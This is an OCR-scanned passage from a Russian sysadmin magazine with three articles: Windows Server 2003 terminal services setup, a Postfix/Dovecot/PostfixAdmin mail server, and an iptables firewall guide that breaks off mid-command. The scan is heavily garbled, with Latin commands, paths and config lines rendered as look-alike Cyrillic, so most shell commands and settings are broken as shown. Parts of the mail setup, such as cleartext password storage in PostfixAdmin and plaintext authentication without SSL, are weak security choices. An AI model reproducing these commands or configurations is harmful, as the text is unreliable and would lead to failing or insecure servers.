цензий, с помощью которого клиентам добавляются лицензии. Для его 
работы также понадобится подключение к серверу МісгозоЙ:. Сначала 
надо выбрать программу лицензирования, ввести номер лицензии и 
указать продукт и тип лицензии. 

В операционной системе ѴѴіпсіоѵѵб Зегѵег 2003 доступно два типа 
клиентских лицензий: «На пользователя» (Рег-ІІзег) и «На устройс- 
тво» (Рег-Пеѵісе) . В первом случае к терминальному серверу можно 
подключаться с неограниченного числа устройств, производится 
лишь проверка учетных данных. Во втором случае маркеры назна- 
чаются каждому устройству, с которого производится подключе- 
ние. Чтобы сервер поддерживал оба варианта, следует выбрать 
Рег-ІІзег. На этом установку сервера можно считать законченной, 
переходим к его настройке. 
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Настройка сервера терминалов 

Для конфигурирования и контроля работы Т5 можно использовать 
несколько инструментов: диспетчер службы терминалов, настрой- 
ку служб терминалов и редактор групповых политик (^ресіп.тзс) . 
Зададим политики с помощью компонента «Настройка служб 
терминалов». Выбираем одноименную вкладку в панели «Админист- 
рирование» или ссылку в «Управлении данным сервером» (Щсс.тзс) . 
Сначала перейдем во вкладку «Параметры сервера». Параметры 
«Использовать временные папки для сеанса», «Удаление временных 
папок при выходе» лучше оставить включенными. Параметр «Ра- 
бочий стол Асгіѵе Оезкіор» тоже не трогаем, поскольку иначе будет 
потребляться большее количество ресурсов на отрисовку активного 
содержимого. По умолчанию опция «Ограничить пользователя 
единственным сеансом» включена, что предотвращает установление 
пользователями нескольких сеансов на одном сервере. Это позво- 
ляет экономить ресурсы. Хотя если пользователю нужен доступ к 
приложениям за пределами рабочего стола, ему может понадобиться 
несколько сессий. Как вариант — для настройки этого параметра 
можно воспользоваться редактором групповой политики, в котором 
нужно выбрать «Конфигурация компьютера -> Административные 
шаблоны -> Компоненты ѴѴіпсіоѵѵб -> Службы терминалов». Здесь 
следует дважды щелкнуть по параметру «Ограничить пользователей 
службы терминалов одним удаленным сеансом». 

Политика лицензирования сервера выбирается в пункте «Лицензи- 
рование». По умолчанию используется вариант «На устройство», 
если требуется, заходим и указываем нужный вариант в списке 
«Режим лицензирования». В терминальном сервере ѴѴ52КЗ имеется 
возможность выбрать один из двух режимов совместимости: «Полная 
безопасность» (Риіі Зесигйу) и «Ослабленная безопасность» (Кеіахесі 
Зесигйу) . Режим «Ослабленная безопасность» позволяет выполнять 
старые приложения, которые не могут нормально работать в услови- 
ях более строгих ограничений на файловую систему и реестр, приня- 
тых в \У32КЗ. По умолчанию используется режим «Полная безопас- 
ность». В случае необходимости его можно изменить, выбрав пункт 
«Совместимость разрешений». Но важно помнить, что в этом случае 
все пользователи будут иметь полный доступ к реестру и файловой 
системе, поэтому такой режим стоит использовать только в исключи- 
тельных случаях. Сервер лицензий обнаруживается автоматически, 
поэтому маркер ТЗ может выдать любой ответивший сервер. Если 
необходимо ограничить работу терминального сервера конкретным 
сервером (или серверами) лицензий, на него необходимо указать в 



пункте «Метод обнаружения сервера лицензий». 

Несколько серверов терминалов могут быть логически сгруппиро- 
ваны в кластер, тогда нагрузка будет распределяться с использо- 
ванием МісгозоЙ Иешогк Ьоасі Ва1апсіп§ (N13) . Специальная база 
данных «Служба папок сеансов» (Тегтіпаі Зегѵісез Зеззіоп ПйесШгу) 
отслеживает все сеансы на сервере терминалов и предоставляет 
данные, используемые при подключении пользователя к текущим 
сеансам. Настройки работы со службой папок сеансов производятся 
во вкладке «Папка сеанса», по умолчанию такая функциональность 
отключена. 

Теперь переходим во вкладку «Подключения», где настраиваются 
параметры входа, безопасность, перенаправление ресурсов клиента 
и прочее. По умолчанию в этой вкладке только одно соединение КЛЗР- 
Тср, но если на компьютере установлено несколько интерфейсов, для 
каждого можно создать соединение с индивидуальными парамет- 
рами. Кстати, при установленном Сйгіх МеіаРгате его соединения 
также будут отражены в этой вкладке. Вызвав контекстное меню, 
можно отключить, переименовать или удалить соединение, а также 
просмотреть и изменить его свойства. Так, по умолчанию во время 
сеанса между клиентом и сервером используется встроенное КПР- 
шифрование, при этом применяется клиентский ключ максималь- 
ной защищенности. Изменить это можно во вкладке «Общие», в 
раскрывающемся списке «Уровень безопасности -> Уровень 
шифрования». 

Здесь же можно указать сертификат сервера. По умолчанию клиенты 
регистрируются под своими учетными записями, но если требуется 
единая учетная запись для входа (например, при обучении), задать 
ее можно во вкладке «Параметры входа». Однако в этом случае зайти 
под администратором будет невозможно. Во вкладке «Сеансы» 
переопределяются параметры тайм-аута для отключенных (окно 
соединения закрыто, но не нажата кнопка «Отключиться»), бездейс- 
твующих и активных сеансов или для переподключения, а в «Среде» 
— начальная программа, выполняемая при входе пользователя (она 
заменяет оболочку Ехріогег) . По умолчанию все эти значения насле- 
дуются из параметров подключающегося к серверу пользователя. 
При необходимости можно запретить запуск начальной программы, 
указать некоторую программу, а также запретить переподключаться 
с другого компьютера. 

Администратор может удаленно подключиться к существующему поль- 
зовательскому сеансу, разрешение на это устанавливается в свойствах 
пользователя («Асйѵе Пігесіюгу — пользователи и компьютеры» 
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или «Локальные пользователи и группы», вкладка «Удаленное 
управление»). Зайдя в «Удаленное управление», можно глобально 
переопределить пользовательские настройки. Возможен как полный 
запрет удаленного управления, так и указание собственных настроек 
для этого сервера. Так, флажок «Запрашивать подтверждение пользо- 
вателя» указывает, необходимо ли согласие пользователя на удален- 
ное управление. С помощью переключателя «Уровень управления» 
выбирается один из двух вариантов: только наблюдение за пользова- 
телем или взаимодействие с сеансом. В последнем случае админист- 
ратор может управлять мышкой и клавиатурой пользователя. 

Во вкладке «Параметры клиента» можно переопределить подключение и 
сопоставление дисков, принтеров и некоторых устройств. Здесь же уста- 
навливается максимальная глубина цвета. По умолчанию все настройки 
распространяются на все сетевые адаптеры. При необходимости во 
вкладке «Сетевой адаптер» можно указать конкретный сетевой адаптер, 
здесь же можно ограничить максимальное количество подключений для 
выбранного адаптера или всего сервера. И, наконец, последняя вкладка 
«Разрешения». Здесь указываются группы и пользователи, которые име- 
ют право подключаться к серверу, и соответствующие им разрешения. 

Доступ к серверу 

В отличие от ѴѴіп2К, которая автоматически разрешает пользова- 
телям доступ после установки терминального сервера, в \У52КЗ по 
умолчанию полный доступ разрешен только администраторам. Все 
остальные пользователи, чтобы получить доступ к терминальному 
серверу, должны входить в группу «Пользователи удаленного рабоче- 
го стола» (Кетозе Пезкгор ІІзегз) . По умолчанию эта группа пуста, и 
самым простым способом разрешить доступ к ТЗ является занесение 
пользователя или компьютера в эту группу. Но здесь не все так прос- 
то, как кажется на первый взгляд. Доступ пользователя определяется, 
исходя из нескольких параметров: 

1 ) отсутствие запрета в «Запретить вход в систему через службу 
терминалов», которая находится во вкладке «Конфигурация компью- 
тера -> Конфигурация ѴѴіпсІоѵѵз -> Назначение прав пользователя» в 
«Редакторе групповых политик»; 

2) разрешение доступа в «Разрешать вход в систему через службу 
терминалов» (по умолчанию только администраторы); 

3) установка флажка «Запретить этому пользователю вход на серве- 
ры терминалов» в свойствах пользователя; 

4) установка во вкладке «Разрешения» свойств КХ)Р-компонента 
«Настройка служб терминалов». 



Если доступ пользователя блокируется, значит, одно из этих условий 
не соблюдено. При подключении можно задать следующие виды 
разрешений: 

1 . «Полный доступ» — все разрешения; 

2. «Доступ пользователя» — вход на сервер, запрос информации, 
переподключение к своему отключенному сеансу; 

3. «Доступ гостя» — только вход в систему; 

4. «Особые разрешения» — администратор самостоятельно ука- 
зывает, какие из девяти возможных операций может производить 
пользователь или группа. 

Настройки с помощью групповых политик 

Если терминальный сервер работает в среде Асгіѵе ОігесШгу, на- 
стройки терминального сервера удобнее производить из редактора 
групповых политик. Для того чтобы новые терминальные серверы 
наследовали установленные политики, добавляем группу «Пользо- 
ватели удаленного рабочего стола» в «Группы с ограниченным досту- 
пом», которые настраиваются во вкладке «Параметры безопасности» 
(«Политика безопасности контроллера домена-> Параметры безо- 
пасности») . И уже из этой вкладки добавляем участников группы. 
Основные настройки производятся с помощью СРО в «Службах терми- 
налов» («Конфигурация компьютера -> Административные шаблоны -> 
Компоненты ѴѴіпсІоѵѵз -> Службы терминалов») . Все параметры разбиты на 
несколько категорий: «Лицензирование», «Шифрование и безопасность», 
«Сеансы» и остальные. Некоторые из них совпадают с имеющимися в 
«Настройке служб терминалов», что позволяет централизованно управлять 
настройками ТЗ без необходимости конфигурирования каждого сервера. 

Заключение 

Вот, собственно, и все настройки терминального сервера. Теперь на 
клиентском компьютере можно вызывать программу «Подключение 
к удаленному рабочему столу», которую легко найти в меню «Пуск 
-> Программы -> Стандартные-^ Связь», и подключаться к серверу, 
используя разрешенные учетные данные. 

И еще два совета. Если компьютер используется как сервер термина- 
лов, установку и удаление программ следует производить исклю- 
чительно через раздел «Панель управления Установка и удаление 
программ». А чтобы правильно завершить работу сервера термина- 
лов, следует использовать команду іззЬшхІп, с помощью которой можно 
предупредить пользователей о завершении сеансов, чтобы они успели 
сохранить работу и отключиться, т 
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Приручение 
почтового ГОЛУБЯ 



Р05ТРІХ + ООѴЕСОТ + МѴ50І-: СТРОИМ НАДЕЖНЫЙ ПОЧТОВЫЙ СЕРВЕР 

Электронная почта появилась и стала популярной задолго до появления интернета, и сегодня без нее уже 
просто невозможно представить современный мир. Это очень быстрый и, главное, простой в использова- 
нии способ передачи информации, понятный даже новичку. Но вот настроить систему отправки и приема 
сообщений не так просто, как это может показаться на первый взгляд. От администратора требуется мо- 
билизовать весь свой опыт, чтобы создать надежную, безопасную и удобную почтовую систему. В статье 
показан только один из возможных вариантов решения этой задачи. 



Устанавливаем РогНіх + йоѵесоі 

Для нашего почтового сервера выберем связку РозШх 
ЦллллллрозШх.оцг) и Эоѵесоі: ( ЧлплдллсІоѵесоСогЕг) . РозШх является одним 
из самых популярных МТА (Май Тгапзіег А^епО, имеет модульную 
структуру, обеспечивающую гибкость в настройках и легкость в 
работе. О безопасности РозШх не говорил только ленивый. В качестве 
сервера, который будет доставлять почту по требованию почтовых кли- 
ентов, используем Эоѵесоі:. Он достаточно прост в настройке, к тому же 
изначально рассчитан на максимальную безопасность и надежность. 
Для поиска в больших файлах применяется бинарный древовидный 
индекс, поэтому голубятня быстро работает даже при больших нагруз- 
ках. Эоѵесоі: может обслуживать запросы пользователей с помощью 
протоколов ітар, ітарз, рорЗ, рорЗз. Еще один плюс этой связки: поль- 
зователи РозШх 2.3 + и Ехіт 4.64+ при отправке сообщения могут быть 
аутентифицированы непосредственно с помощью средств Эоѵесоі: (в 
частности ЗАЗБ — Зітріе Аілйепйсагіоп апб ЗесигПу Ьауег) без привле- 
чения дополнительных библиотек вроде Суш 8 ЗАЗБ. Это, естественно, 
упрощает настройку и повышает общую надежность всей системы. 
Ориентироваться будем наІіЬипШ 7.04, но практически все, за 
исключением команд установки пакетов, будет действительно и для 



остальных дистрибутивов. Советую не навешивать сразу дополни- 
тельную функциональность на эти сервисы, я имею в виду проверку 
на спам и вирусы, работу с БД и прочее. Если в настройки закрадется 
ошибка, найти ее будет на порядок сложнее. Лучше фиксировать 
настройки на некотором этапе и, убедившись в работоспособности, 
добавлять следующую функциональность. Итак, с помощью зіісіо 
аргсасйе зеагсй розШх и зибо аргсасЬе зеагсЬ боѵесоі: ищем нужные 
пакеты и ставим: 

$ зисіо арС-деС іпзСаІІ «іоѵесоС-сошшоп (ІоѵесоС-ітарсІ 

сіоѵесоС-рорЗсІ розСБіх-туздІ 

В процессе установки будут добавлены системные пользователи 
розШх и боѵесоі:, группы розШх, розіхігор, а также созданы все необхо- 
димые каталоги. Кроме этого, пользователь боѵесоі: будет добавлен в 
группу таіі. 

Я выбрал два пакета: сіоѵесогітарсі и сІоѵесоГрорЗсІ. В каждом находят- 
ся модули, обеспечивающие доступ по соответствующему протоколу. 
Если какой-либо из них не нужен, пакет можно не ставить. Смотрим, 
какие модули доступны для РозШх: 
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Создание нового пользователя в РозЙіх Асітіп 



$ розбсопЕ -а 

сугиз 

боѵесок 

Требуемый модуль для работы с сіоѵесоі: в списке есть, поэтому нет 
необходимости в пересборке РозШх. Но тем, кто все-таки захочет само- 
стоятельно собрать оба сервера (например, чтобы использовать самую 
последнюю версию), советую сначала установить пакеты для удовлетво- 
рения зависимостей: 

$ зибо арб-деб Ьиіісі-сіер розбііх-тузді \ 

боѵесоб-соттоп боѵесоб-ітарб боѵесоб-рорЗб 

Компиляция Розбзх и Поѵесоі: стандартна, все нужное, как правило, 
устанавливается по умолчанию, только при сборке РозіТіх необходимо 
использовать команду: 

$ таке такеіііез ССАКС8= ' -БІІ8Е_8А8Ь_АІІТН \ 
-БВЕЕ_ЗЕКѴЕК_ЗА8Ь_ТУРЕ=\ "боѵесоб\ " ' 

Вот, собственно, и все премудрости. 

Конфигурационный файл РозНіх 

По ходу установки через репозитарий пакетов в Шлют будут зада- 
ваться некоторые вопросы по архитектуре будущей почтовой системы 
(доставка почты напрямую, локальная доставка, смарт-хост) , кроме 
того, некоторые параметры будут взяты из настроек системы. Поэтому 
после установки РозШх практически на 99% готов к работе. Основной 
конфигурационный файл называется /еЩ/розіііх/таіп.сб 

$ зисіо тсес1іІ/еІс/ро5Ійх/таіп.с{ 

# Имя, домен и псевдонимы почтового узла 
туЬозкпаше = дгіпсіег.сот 

тусіотаіп = дгіпбег . сот 
а1іаз_тарз = Пазк : /ебс/аііазез 
а1іаз_бабаЪазе = ПазП : /ебс/аііазез 
туогідіп = $тукозкпате 

# Список доменов, через которые будет осуществляться 
локальная доставка 

тубезбіпабіоп = $туЪ.озбпате , ІосаПюзб . $туботаіп, 
ІосаІЬозб 

# Список сетей, которым разрешен геіау; слушаем на всех 
интерфейсах 

тупебѵгогкз = 127.0.0.0/8, 192.168.1.0/24 
іпек_іпкег1асез = аіі 



# Баннер, выдаваемый при подключении 
зтбрсЫэаппег = $тукозкпате ЕЗМТР $таі1_пате (ГПэипби) 
Ы11 = по 

# Снимаем комментарий, если хотим снять ограничение на 
размер ящика (по умолчанию 51 200 000 байт) 

# таі1Ьох_зІ2е_1ітіб = 0 
гесіріепб_бе1ітібег = + 

# Формат почтового ящика, возможен вариант МаіІЬох 
Ь.оте_таі1Ьох = Маіібіг/ 

# Каталоги для хранения почты и очереди Розбііх 
таі1_зроо1_бігесбогу = /ѵаг/таіі 
диеие_бігесбогу = /ѵаг/зрооі/розбііх 

# Генерация сообщения о задержке почты 
б.е1ау_^агпіпд_біте = 4 И 

Просмотреть значения всех параметров можно, введя команду 
розщопб В каталоге /изг/зйаге/розШх лежит несколько шаблонов, в 
таіп.сббізі: представлены практически все основные настройки. При 
установке сервера создаются необходимые ЗЗЬ-ключи и сертификаты, 
следует лишь проверить их наличие. По окончании настроек переза- 
пускаем РозШх: 

$ зибо /ебс/іпіб . й/розНіх гезкагб 

И пробуем подключиться телнетом к 25-му порту. Если сервер ответил 
должным образом, переходим к настройке ПоѵесоС 

Конфигурационный файл Роѵесоі 

Все настройки Поѵесоі: производятся в одном файле /еііс/сіоѵесоі:/ 
сіоѵесоі:. сопб Файл большой, его вывод занимает несколько экранов. 
Спасает то, что он хорошо комментирован и разбит на секции. Хотя 
большинство настроек также можно оставить в значении по умолчанию 
(то есть закомментированными) . 

$ зисіо тсесііі/еіс/сіоѵесоі/сіоѵесоі.соп^ 

# Каталог для хранения временных файлов 
Ьазе_біг = /ѵаг/гип/боѵесоб/ 

# Протоколы, которые будем использовать; я включил все, 
но лишние можно убрать; 

# если боѵесоб используется для аутентификации, а не 
для доставки почты, выставляем попе 

ргобосоіз = рорЗ рорЗз ітар ітарз 
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# Разрешаем подключения без использования ЗЗЬ/ТЬЗ 
бізаЫе_р1аіпбехб_аибП = по 

# Перед выключением Боѵесоб тазбег ргосезз останавлива- 
ем все ІМАР- и РОРЗ -процессы 

#зЪ.иббоѵ\лі_с1іепбз = уез 

# Время в журнале в формате збгббіте(З) 

1од_бітезбатр = «%У-%т-%б %Н:%М:%3 » 

1одіп_1од_богтаб_е1етепбз = изег=<%и> теббюб=%т гір=%г 
1ір=%1 %с 

зуз1од_басі1ібу = таіі 

# Учетная запись, используемая при регистрации 
1одіп_изег = боѵесоб 

# Расположение почтовых ящиков пользователей (ранее 
бебаи1б_таі1_епѵ зеббіпд) 

# По умолчанию параметр пустой, и Боѵесоб пробует ящики 
самостоятельно . 

таі1_1осабіоп = таіібіг : /ѵаг/таі1/%и/Маі1біг : ШБЕХ=/ 
ѵаг/шаі1/%и 

# Группы, позволяющие получить доступ к каталогам поч- 
товых ящиков 

таі1_ехбга_дгоирз = таіі 

# Полный доступ в пределах почтового ящика 
таі1_би11_бі1езузбет_ассезз = по 

# Первый разрешенный ЩБ, для того чтобы пользовате- 
ли не могли регистрироваться как демоны или системные 
пользователи 

бігзб_ѵа1іб_иіб = 500 
#1азб_ѵа1іб_иіб = 0 

# Маска для вновь создаваемых файлов 
шпазк = 0077 

# Механизмы ЗАЗЬ-аутентификации 
аибП беіаиіб { 

# возможны варианты: ріаіп Іодіп бідезб-шбБ сгат-тб5 
пбіт гра арор апопутоиз дззарі 



тесПапізтз = ріаіп Іодіп 

# эта строка специфическая для взаимодействия с Розбііх 
зоскеб Іізбеп { 

сііепб { 

рабк = /ѵаг/зрооІ/розбііх/ргіѵабе/аибП 
шобе = Об 60 
изег = розбііх 
дгоир = розбііх 
} 

} 

# Для начала настроим систему на работу с локальными 
пользователями, занесенными в /ебс/раззмб 

раззсПэ раззжі { 

} 

изегсПэ раззілб { 

} 

Перезапускаем Поѵесоі:: 

$ зибо /ебс/іпіб . б/боѵесоб гезбагб 

Для проверки работы системы можно использовать іеіпеі, но пароль в 
открытом виде воспринят не будет, поэтому нам понадобится Регі-мо- 
дуль МІМЕ-Ва$е64: 

$ баг хгѵб МІМЕ-Вазе64-3 . 07 . баг . дг 
$ сб МІМЕ-Вазеб4-3 . 07 
$ регі МакебіІе.РЬ 
$ таке 
$ таке безб 

Если все тесты прошли нормально, устанавливаем: 

$ зибо таке іпзбаіі 

Теперь нужно получить перекодированную строку, в качестве параметра 
вводим два раза логин и один раз пароль: 

$ регі -ММІМЕ : :Вазе64 -е ’ргіпб епсобе_ 

Ьазеб4 ( " дгіпбег\0дгіпбег\ 

0раззѵ\гогб" ) ; ' 

23 ЦрЪтКІсдВпст1и2СѴуАНВЬ.сЗШЪЗ бк 
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Соединяемся с сервером: 

$ кеіпек Іосаікозк 25 

2 50 -АІІТН РЬАШ ЬОСШ 
2 5 0 -ЕШАЫСЕБ5ТАТІІ5ССЮЕБ 
250-8ВІТМІМЕ 
250 ЬЗЫ 

Вводим полученную ранее строку: 

АІІТН РЬАШ 23 НрЪтНІсдВпст1и2СѴуАНВксЗШЪЗ Бк 

235 2.0.0 Аиккепкісакіоп зиссеззкиі 

ОШТ 

221 2.0.0 Вуе 

Система аутентификации при отправке сообщения работает нормально. 
Для проверки всего цикла настраиваем почтовый клиент (РОРЗ — порт 
110, РОРЗ/ЗЗЬ— 995, ІМАР — 143 иІМАР/ЗЗЬ— 993) и пробуем отпра- 
вить и получить почту. Параллельно для анализа журналов в консоли 
вводим «іаіі -1 /ѵаг/1о§/таі1.1о§». 

В итоге мы получили простую в администрировании и безопасную 
почтовую систему, которая подойдет для небольших организаций. 
Достаточно добавить нового пользователя командой асМизег, и он может 
отправлять и получать почту с нового сервера. 

В организациях с большим числом пользователей такая схема работы 
будет неудобна. И систему следует наращивать дальше. Для примера 
добавим РозШх Абтіп, а учетные записи пользователей перенесем в базу 
данных. 

Прикручиваем РозІІіхАсІтіп 

Для начала следует убедиться, что Розіііх собран с поддержкой 
нужной БД: 

$ розксопк -ш I дгер шузді 
тузді 

Все нормально. Устанавливаем АрасЬе, МуЗС^Ь и необходимые модули: 

$ зисіо арк-дек іпзкаІІ тузді-зегѵег тузді-сііепк 
араске2 .2-сотшоп ркр5-тузд1 

Сайт проекта Розіііх Айтіп находится по адресу зі.пеі/ртіесіз/ 
розіііхасітіп, забираем последнюю версию и устанавливаем: 

$ каг хѵгЕ розккіхас1тіп-2 .1.0. кд 2 
$ ссі . /розккіхас1тіп-2 . 1 . 0 

Внутри каталога находится файл с описанием параметров доступа к БД, 
вводим зисіо тсеДп ПАТАВ АЗ Е_МУ 3 Ь . ТХТ и редактируем все необходи- 
мое в секциях РозШх шег & раззѵѵогсі и Розіііх АДтіп изег & разБѵѵогсІ. По 
окончании устанавливаем новую базу данных: 

$ шузді -и гоок -р < БАТАВАЗЕ_МУЗ<2Ь . ТХТ 

Далее следует скопировать все файлы в корневой каталог веб-сервера, в 
ІіЪипШ это /ѵагДлАлдлс 



$ ССІ . . 

$ зисіо ср -г розккіхас1тіп-2 . 1 . 0 /ѵат/ѵіѵт 

$ зисіо тѵ /ѵаг/ѵллпл/розккіха<Зтіп-2 . 1 . 0 /ѵаг/ѵллпл/ 

розккіхасітіп 

Патчим Розіііх АДтіп: 

$ ѵ/дек — с кккр : / /кгоеіз . агѵіп . <5к/<іЪ/розккіхасІтіп/ 
розккіхасітіп-2 . 1 . 0-агѵіп-тагкіп . ракск 

$ зисіо сак розккіхасітіп-2 . 1 . 0-агѵіп-тагкіп . ракск I 
ракск -рі 

Переименовываем шаблон конфигурационного файла: 

$ ссі /ѵаг/шлл/розккіхасітіп 

$ зисіо тѵ сопкід . іпс . ркр . затріе сопкід . іпс . ркр 

И правим: 

$ зисіо тсесііі сопйд.іпс.рЬр 

# Меняем все строки «скапде-ккіз-ко-уоиг . сіошаіп . кісі» 
на имя своего узла; 

# проверяем параметры доступа к БД и правим следующие 
переменные : 

$ССЖЕ [ ' сіошаіп_ракк ' ] = ' УЕЗ ' ; 

$ССЖЕ [ ' с!отаіп_іп_таі1Ъох' ] = ШО' ; 

$ССЖЕ [ ' епсгурк ' ] = 'сіеагкехк'; 

Смотрим, под какой учетной записью работает веб-сервер, и устанавли- 
ваем соответствующие права доступа к каталогу: 

$ сак /екс/араске2/араске2 . сопк | дгер ІІзег 
ІІзег ѵмѵі - сіака 

$ зисіо скоѵлі -Б ѵллпл-сіака : ѵллм-сіака /ѵаг/ѵллпл/ 
розккіхасітіп 

$ зисіо сктосі -К 7 00 розккіхасітіп 

Если в Шипш сейчас попробовать зайти через браузер по адресу 
Ьнр: //ІосаШоБі/роБіІіхаДтіп. веб-сервер выдаст запрос на поиск 
программы для открытия РНТМЬ-файла. Поэтому в конфигурационный 
файл веб-сервера добавим пару строк: 

$ зисіо тсесШ /еІс/арас!іе2/арасІіе2.сопІ (урезано) 

<ІкМосіи1е тосі_тіте.с> 

АсісіТуре арріісакіоп/х-кккрсі-ркр .ркр .рккті 
АсісіНапсіІег сді-зсгірк .рі 

Теперь перезапускаем веб-сервер и пробуем зайти на нужную страницу. 
Для того чтобы проверить установки, следует нажать на ЗеШр. Будет 
произведен поиск всех компонентов, особое внимание обращаем на 
наличие ошибок (Еггог), означающее отсутствие нужного компонента. 
По окончании настроек рекомендуется удалить зешр.ркр и создать файл 
.ЬіразБшсі в каталоге /ѵаг/ѵѵѵѵш/роБіііхасітіп/асітіп. 

А процедуру прикручивания МуЗС^Ь к Розіііх и Поѵесоі ищи в полной 
версии статьи на прилагаемом ШІ). Удачи. ИНИ 
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Сам себе файрвол, 

САМ СЕБЕ МАРШРУТИЗАТОР 



НАСТРАИВАЕМ МЕЖСЕТЕВОЙ ЭКРАН НА БАЗЕ ІРТАВІ.Е5 + РАТСН-О-МАТІС 

Если ты работаешь сисадмином (или исполняешь его обязанности) в более-менее крупной конторе, то 
ты наверняка не раз задумывался о безопасности своих железных питомцев. Как правило, количество 
серверов и маршрутизаторов растет пропорционально подсетям, управлять которыми с каждым днем 
становится все сложнее и сложнее. В особо тяжелые моменты ты мечтаешь о счастливых временах, когда 
вся сеть будет администрироваться с одного-единственного сервера парой-тройкой команд в консоли. 
Администрирование всей сети — тема далеко не одной статьи, но для того чтобы максимально прибли- 
зить мечты к реальности, достаточно пакета ірііаЫез и немного терпения. 



Файрвол и маршрутизатор в одном флаконе 

Пакет іріаЫез позволяет как маршрутизировать сети, так и фильтровать 
входящие и исходящие пакеты. Таким образом, ІріаЫез может выступать 
и в роли маршрутизатора, и в роли очень мощного файрвола. 

Чтобы не быть голословным, хочу показать тебе ІріаЫез в действии. Я на- 
бросал небольшую схему сети, кото рую ты можешь увидеть на рисунке. 
Она содержит в себе один сервер с выходом наружу, четыре рабочие стан- 
ции в четырех подсетях и удаленную машину, которая работает с одним 
из внутренних серверов. 

Для экспериментов нам понадобится простейшая машина с Ьіпііх, в кото- 
рую нужно воткнуть столько сетевых карт, сколько подсетей мы будем 
соединять (в нашем случае 4+1 = 5). ІріаЫез желательно взять не ниже 
версии 1.3.5. 

Нам нужны четыре подсети, в каждой из которых может работать менее 
255 пользователей, с общим выходом в интернет и учетом трафика с 
помощью ИеіАтз (просто для примера). Из серверов — дваѴѴеЬ (один 
из которых с ЗЗЬ) : один с 55Н для конфигурирования главного сервера, 



чтобы на него не открывать доступ снаружи, и М55(2Ь, ну, например, для 
одного офиса, который будет работать с базой данных. Схему можно ме- 
нять. Принцип от этого не изменится. Главное — понять, как происходит 
маршрутизация, и разобраться в настройках ІргаЫез. 

Немного теории 

По умолчанию ІрГаЫез содержит в себе три таблицы. Мап^іе — эта 
таблица, как правило, используется для внесения изменений в заголовок 
пакета, например для изменения битов Т05 и ТТЬ. №1: применяется 
для выполнения преобразований сетевых адресов. И, наконец, таблица 
Рікег, название которой говорит само за себя, — с ее помощью мы 
будем фильтровать пакеты и, в случае необходимости, перенаправлять, 
зеркалировать или убивать. Все основные действия будем производить 
в таблице Рікег. Наличие прямого назначения каждой из таблиц вовсе 
не означает, что в ней нельзя осуществлять других действий. Например, 
задропить пакет мы можем и в Иаі:/Мап§1е, но рекомендуется все же 
делать это в таблице Рікег. 
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Каждая из таблиц содержит в себе несколько логических цепочек, поря- 
док прохождения которых определяется вектором пакета. Вот дефолт- 
ные цепочки этих таблиц: 

Мапдіе : РКЕКОШТШ, ШРІІТ, РОКМАРБ, ОБТРБТ, 

Р05ТК0БТШС 

ЫаР: РКЕКОБТШС, ОБТРБТ , РОЗТКОБТІШ 
РіІРег : ШРБТ, ЕОКМАКБ, ОБТРБТ 

Конечно, ничто не мешает нам добавить свою цепочку. Это может по- 
требоваться для того, чтобы зарулить пакеты на систему учета трафика. 
Порядок прохождения входящих и исходящих пакетов более наглядно 
представлен на схеме. Несложно увидеть, что, если, допустим, пакет 
идет через шлюз к рабочей станции, он проходит следующий порядок 
цепочек: Мап§1е:РКЕКОШІ№}-» ПаБРКЕКОШЖС -» Рікег:РОКѴѴАВХ) 

-> Мап^іе :ЕОКѴѴАКІ) -> ШЪРОЗТКОЦТШС Мап§1е:Р05ТК0ШШС. 
Чтобы перенаправить пакет с сетевого интерфейса сервера на порт 1433 
машины 192.168.2.100, нам нужно добавить соответствующее правило в 
таблицу паі, в цепочку РКЕКОШШС. 

Ка к уста н а в л и в ать 

Для начала убедись, что ядро собрано с поддержкой ИеШІег. Для этого 
зайди в исходники ядра и набери таке теписопіі^ (или таке хсопй§) . 
Затем перейди в следующую ветку (для ядра 2.6.x) : «ПеГѵѵогкіп^ -> 
Пеіѵ\югкіп§ оргіопз № Аѵогк раскеі 1ікегіп§ Ігатешогк (ИеШкег) -> ІР: 
ИеШІег Сопй§игайоп» и отметь все опции как модули. Затем открой /еіс/ 
зузсіі.сопі и добавь в конец строку «пеі.ірѵ4.ір_іог\ѵагсі = 1». 

Теперь качай свежий пакет ІріаЫез и устанавливай его стандартными 
«./сопй§иге; таке; таке іпзіаіі». После этого у тебя должен появиться 
файл /еіс/іпй.сІ/іріаЫез. Он заставит ІріаЫез работать в роли сервиса. 
Убедись, что файл реально запустится при загрузке, для этого набери 
в консоли «сйксопіі^ -Іеѵеі 345 іріаЫез оп». На этом установку можно 
считать завершенной. 

Как пользоваться 

Теперь я вкратце поясню, как работать с ІрНаЫез и какие команды при 
этом нужно использовать. Команда іртЫез-Ь позволяет просматривать 
содержимое таблицы. По умолчанию используется таблица Рікег. Для 
того чтобы явным образом указать другую, добавляем -1 іаЫепате. Вмес- 
те с ключом ‘-С можно использовать еще несколько полезных опций. 
Например, ‘-п’ — применяется для того, чтобы заменить все строковые 
данные числовыми; ‘V — подробный режим, отображает названия сете- 
вых интерфейсов и количество переданных и принятых пакетов; ‘-Ііпе- 
пшпЪегз’ — с помощью этого аргумента можно пронумеровать строки, 
это бывает полезно, когда требуется удалить какую-то строку посреди 



очень длинной цепочки. Таким образом, чтобы вывести всю информа- 
цию по таблице №1, пишем: іріаЫез -Ь -пѵ -1 паі— Ііпе-питЬегз. 

В пакет ІртЫез входят еще две утилиты: іртЫез-заѵе (для сохранения 
таблиц) и іртЫез-гезіоге (для их восстановления) . Если для того чтобы 
сохранить таблицы, достаточно написать «іріаЫез-заѵе -1 паі > /еіс/ 
іртЫез.заѵе», то утилита восстановления воспринимает только стандарт- 
ный поток вывода на экран: іріаЫез-гезіоге | саі/еіс/іртЫез.заѵе. Но 
не спеши прописывать это в гс.іосаі, все гораздо проще. Для сохранения 
настроек, которые после перезагрузки будут сами восстанавливаться, 
нужно написать «зегѵісе іртЫез заѵе» — и все ! 

Как конфигурировать 

Для начала закроем все лишнее снаружи, отфильтруем левые адреса от 
МЗЗС^Ь и переадресуем необходимые порты по их прямому назначению. 
Проверь с помощью птар наличие открытых портов: птар 127.0.0.1. 
Допустим, утебя открыты порты 21, 22, 80, 111, 139, 445,953,993, 1723и 
2628. У меня нет никакого желания открывать доступ на 22-й порт снару- 
жи, поэтому сделаем так, чтобы стучаться изнутри на него могла только 
одна машина — 192.168.1.100. А извне направим на нее все пакеты с 
22-го порта. Если злоумышленник и зайдет по 55Н, пусть думает, что за- 
хватил сервер ! Но на самом деле он будет находиться на пустой машине с 
одним только ЗЗН.Адошлюзаещедалеко... 

# ірЕаЫез -А РКЕКОБТШС -і еЕЕО -р Еср -ш Еср \ 

